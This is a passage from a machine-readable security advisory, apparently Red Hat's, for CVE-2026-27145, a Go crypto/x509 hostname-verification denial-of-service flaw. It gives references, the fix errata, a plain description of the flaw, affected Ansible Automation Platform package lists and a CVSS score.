"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27145"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27145",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27145"
},
{
"category": "external",
"summary": "https://go.dev/cl/783621",
"url": "https://go.dev/cl/783621"
},
{
"category": "external",
"summary": "https://go.dev/issue/79694",
"url": "https://go.dev/issue/79694"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw",
"url": "https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5037",
"url": "https://pkg.go.dev/vuln/GO-2026-5037"
}
],
"release_date": "2026-06-02T22:01:36.954000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "A flaw was found in the Go standard library crypto/x509 package. When verifying a TLS certificate hostname, VerifyHostname processed each DNS Subject Alternative Name (SAN) entry in a loop and repeatedly split the candidate hostname on \".\" characters. For certificates with a very large DNS SAN list, CPU use could grow quadratically with the number of SAN entries and hostname labels. Because hostname verification runs before the certificate chain is built, this overhead can occur even when the certificate is not trusted.\n\nRed Hat rates this issue as Important. It affects Red Hat products that include the Go standard library crypto/x509 code from an affected Go toolchain version (before Go 1.25.11, or from Go 1.26.0 through Go 1.26.3). Applications and container images built with a fixed Go release (1.25.11 or later, or 1.26.4 or later) are not affected. Community distributions such as Fedora are also affected.\n\nUpstream fix: Go 1.25.11 and Go 1.26.4 (GO-2026-5037).",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
